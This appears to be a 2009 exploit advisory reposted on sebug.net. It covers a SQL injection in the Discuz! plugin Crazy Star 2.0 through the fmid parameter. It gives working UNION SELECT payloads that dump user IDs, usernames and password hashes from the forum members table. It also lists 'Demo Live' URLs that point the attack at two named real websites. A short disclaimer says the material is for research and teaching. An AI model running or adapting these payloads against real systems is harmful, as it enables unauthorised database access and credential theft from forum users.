Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Inject
SSV ID:12145
SEBUG-Appdir:Discuz!
发布时间:2009-08-26测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
============================================================
Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
============================================================
========================[Author]=========================
[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]
========================[Soft Info]=========================
Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com
[-] Exploit:
[+] 1) Register a User
2) Login!
[+]and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
[?] = Valid fmid Number
[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--
[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--
/---------------------------------------------www.zhaohuan.net-----------------------------------------\
Today is the VALENTINE'S Day in China, the seventh day of the seventh lunar month.
Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky
Greetz : Weeny <- love u more & more
\--------------------------------------------------------------------------------------------------------------/
// sebug.net [2009-08-27]
Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Inject:等您坐沙发呢!